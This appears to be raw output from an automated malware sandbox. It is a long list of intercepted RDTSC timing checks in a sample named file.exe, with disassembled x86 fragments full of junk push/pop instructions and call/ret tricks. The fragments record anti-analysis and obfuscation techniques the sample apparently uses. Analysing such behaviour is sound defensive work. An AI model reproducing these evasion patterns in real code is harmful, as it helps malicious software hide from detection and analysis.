Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC9B7E second address: AC9B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D0397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC9B9D second address: AC9C32 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F23952C8E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 6A239B81h 0x00000012 jmp 00007F23952C8E2Eh 0x00000017 push 00000003h 0x00000019 or di, 1243h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F23952C8E28h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov ecx, 339ACBE3h 0x0000003f jmp 00007F23952C8E2Eh 0x00000044 push 00000003h 0x00000046 mov edx, ebx 0x00000048 push A26167DFh 0x0000004d push ecx 0x0000004e push eax 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 pop eax 0x00000052 pop ecx 0x00000053 add dword ptr [esp], 1D9E9821h 0x0000005a movsx esi, ax 0x0000005d lea ebx, dword ptr [ebp+1244B834h] 0x00000063 stc 0x00000064 sub dh, FFFFFFE0h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F23952C8E33h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE89EF second address: AE8A17 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23947D0386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F23947D0399h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8DC4 second address: AE8DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8DCA second address: AE8DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8DCE second address: AE8DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F23952C8E26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8DDC second address: AE8DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8F09 second address: AE8F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F23952C8E26h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jns 00007F23952C8E26h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE8F1F second address: AE8F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F23947D0386h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F23947D0398h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9390 second address: AE93C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23952C8E34h 0x00000009 jmp 00007F23952C8E33h 0x0000000e jo 00007F23952C8E26h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE951D second address: AE9542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947D0392h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F23947D0386h 0x00000012 jno 00007F23947D0386h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9695 second address: AE96A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F23952C8E26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96A3 second address: AE96B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96B0 second address: AE96CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 jl 00007F23952C8E34h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F23952C8E2Ch 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9810 second address: AE982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F23947D0386h 0x0000000a jmp 00007F23947D0394h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE99A4 second address: AE99A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD212 second address: ADD220 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F23947D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD220 second address: ADD226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD226 second address: ADD232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F23947D0386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9C64 second address: AE9C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F23952C8E26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9C71 second address: AE9C9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F23947D038Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F23947D0395h 0x00000013 jmp 00007F23947D038Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA45C second address: AEA478 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F23952C8E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F23952C8E34h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA5AF second address: AEA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947D0393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEA5C6 second address: AEA5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF11EF second address: AF11F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF180D second address: AF181D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF181D second address: AF1835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1835 second address: AF183B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF183B second address: AF186F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F23947D0398h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F23947D038Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF186F second address: AF1873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF087D second address: AF0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF735E second address: AF7362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6BBB second address: AF6BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF70DE second address: AF70E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF7207 second address: AF7219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F23947D0386h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF7219 second address: AF721F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6D90 second address: AB6D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6D96 second address: AB6DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F23952C8E26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6DA3 second address: AB6DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6DA7 second address: AB6DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7B2 second address: AFA7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7BB second address: AFA7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1C5D second address: AB1C6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1C6A second address: AB1C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1C70 second address: AB1C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1C74 second address: AB1C80 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F23952C8E26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFAE5B second address: AFAEA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D038Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F23947D0392h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F23947D0392h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jo 00007F23947D0392h 0x00000023 jc 00007F23947D038Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFAEA9 second address: AFAF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push 00000000h 0x00000007 push esi 0x00000008 call 00007F23952C8E28h 0x0000000d pop esi 0x0000000e mov dword ptr [esp+04h], esi 0x00000012 add dword ptr [esp+04h], 00000019h 0x0000001a inc esi 0x0000001b push esi 0x0000001c ret 0x0000001d pop esi 0x0000001e ret 0x0000001f mov esi, ebx 0x00000021 call 00007F23952C8E29h 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F23952C8E2Ch 0x0000002d je 00007F23952C8E26h 0x00000033 popad 0x00000034 push edi 0x00000035 jmp 00007F23952C8E2Eh 0x0000003a pop edi 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jne 00007F23952C8E2Ch 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFAF0F second address: AFAF4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F23947D0386h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b je 00007F23947D0386h 0x00000021 jmp 00007F23947D0399h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBAED second address: AFBAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBAF1 second address: AFBB02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F23947D0394h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBB02 second address: AFBB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBB08 second address: AFBB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBB15 second address: AFBB1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC097 second address: AFC09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC09B second address: AFC0B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23952C8E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC0B7 second address: AFC0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC0BD second address: AFC0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD023 second address: AFD07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F23955E2768h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jl 00007F23955E276Ch 0x0000002b mov edi, dword ptr [ebp+122D35A4h] 0x00000031 push 00000000h 0x00000033 ja 00007F23955E2772h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jng 00007F23955E2768h 0x00000042 push esi 0x00000043 pop esi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFCEA3 second address: AFCEBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23955E58E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFE26E second address: AFE28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F23955E2779h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFD838 second address: AFD83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEAB2 second address: AFEAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEC86 second address: AFEC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEC92 second address: AFEC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEC96 second address: AFECCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23955E58DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D3237h] 0x00000019 push 00000000h 0x0000001b mov esi, 11D27224h 0x00000020 and edi, dword ptr [ebp+122D2C14h] 0x00000026 push eax 0x00000027 push ebx 0x00000028 pushad 0x00000029 jp 00007F23955E58D6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFF766 second address: AFF774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F23955E276Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFF774 second address: AFF7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F23955E58E8h 0x0000000b nop 0x0000000c pushad 0x0000000d add edx, dword ptr [ebp+122D2E10h] 0x00000013 mov dword ptr [ebp+122D1BB3h], edi 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jmp 00007F23955E58DCh 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F23955E58D8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d add dword ptr [ebp+122D1A9Bh], eax 0x00000043 mov dword ptr [ebp+122D570Dh], edi 0x00000049 jmp 00007F23955E58E1h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jg 00007F23955E58D6h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B00C65 second address: B00C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B00C6B second address: B00C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03244 second address: B03268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23955E276Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F23955E276Dh 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0600D second address: B06011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06011 second address: B0601B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F23955E2766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07E4F second address: B07EBE instructions: 0x00000000 rdtsc 0x00000002 js 00007F23955E58DCh 0x00000008 ja 00007F23955E58D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F23955E58D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov bx, 3354h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 movzx edi, bx 0x00000035 pop edi 0x00000036 mov edi, dword ptr [ebp+124459D0h] 0x0000003c push 00000000h 0x0000003e mov bx, 137Fh 0x00000042 xchg eax, esi 0x00000043 jmp 00007F23955E58E2h 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F23955E58E1h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07EBE second address: B07EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07EC2 second address: B07ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07ECC second address: B07ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08D78 second address: B08D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F23955E58D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08028 second address: B0803F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F23955E2766h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0803F second address: B08044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09F85 second address: B09F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D086 second address: B0D08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D08C second address: B0D0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F23955E2772h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D0A9 second address: B0D0AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D0AE second address: B0D10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F23955E2768h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, esi 0x00000026 call 00007F23955E2771h 0x0000002b pop ebx 0x0000002c push 00000000h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push ecx 0x00000031 jno 00007F23955E2766h 0x00000037 pop ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F23955E2776h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D10E second address: B0D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
